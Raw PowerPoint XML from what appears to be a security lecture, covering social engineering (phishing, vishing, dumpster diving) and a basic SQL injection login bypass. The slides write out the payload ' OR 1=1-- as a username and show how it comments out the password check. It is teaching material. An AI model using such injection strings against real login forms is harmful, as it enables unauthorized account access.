              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E1D7E97-5A05-4B73-A121-7D97F4CF2B55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Social engineering: the human </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>factor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CasellaDiTesto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8CFDA38-45B9-4B41-AB90-06C8BD51F035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1122218"/>
            <a:ext cx="9221155" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>patched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> so the security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>certainly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>guaranteed</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As</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>humans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>involved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in the use of computer systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>represent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>weakness</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
        <p:nvSpPr>
          <p:cNvPr id="4" name="CasellaDiTesto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5D22F2-6305-4542-AA22-B9F98FD020A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716972" y="3844636"/>
            <a:ext cx="9019310" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"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 but they are sufficiently pervasive that we must design our protocols around their limitations.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kaufman et al.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25299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4D6AC77D-87E4-4CA8-B5B2-4533E3BA3DA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B76AD382-9AD9-4FFB-8599-FCF2C2F62E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Social engineering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA05CC49-8ED3-49CB-AFD8-69D46DA7CC07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1257300"/>
            <a:ext cx="927310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most common psychological techniques used in social engineering involve the exploitation of tools such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>authority, guilt, panic, ignorance, desire, greed and compassion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Phishing is one of the most used techniques to fool the victim.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Usually an email is sent to the victim, making it look as similar as possible to a message sent by a certain company. The person is pushed to download an attachment that presents a malware or to click on an internal link in the email that leads to a web page very similar to the original one of the service provider, presenting a form to fill in where there are usually fields such as PIN code bank or password.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Telephone phishing, also called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>vishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, is frequently used, in which a particular context is simulated such as a call center, through which it is possible to receive greater trust from the person involved in the attack.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Last but not least, one of the most precious source of information is garbage: a social engineer that needs to acquire information about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, for example to gain trust, could do the so called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>dumpster-diving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3508718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6AA1B3D-89B6-4344-89F3-3658CDE4FF9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4394713-E525-44B9-B9E9-FA4FFF95C439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> look to exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CasellaDiTesto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B8F7289-CEB0-4FD8-A26F-18D9144628A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="864000"/>
            <a:ext cx="9377018" cy="6063198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>According</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to OWASP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Web Application Security Project), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> one of top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten</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occurs when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>an application doesn’t checks the input from the users and permit them to execute arbitrary database queries</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simple example of SQL Injection can be shown by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>analyizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a log-in form that requires username and password.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 assume that when the user inserts his credentials, the query that will be executed on the database is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>SELECT * FROM users WHERE name = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Marco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>’ AND password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Urbano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="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dirty="0"/>
              <a:t>What would happen if the application is vulnerable to SQL Injection and the user inserts these data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>USERNAME: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>‘ OR 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PASSWORD: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Urbano</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3819873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CBF4B2CE-20EE-4C44-A793-A5731ADB2AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891C252B-8058-4DD4-82DD-1F527E633CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="432000"/>
            <a:ext cx="10073209" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> look to exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> injection (PT. 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D4887A0-9BC8-427B-9018-B4453141E5D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529936" y="1070264"/>
            <a:ext cx="9289473" cy="4770537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Assuming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>resulting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be the following one:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>SELECT * FROM users WHERE name = ‘’ OR 1 = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- AND password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" strike="sngStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Urbano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>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t>The WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>clause</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> TRUE and the database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> the first record in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>named</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> ‘users’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>imagine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> record </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"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If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a look to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>causes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>effect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
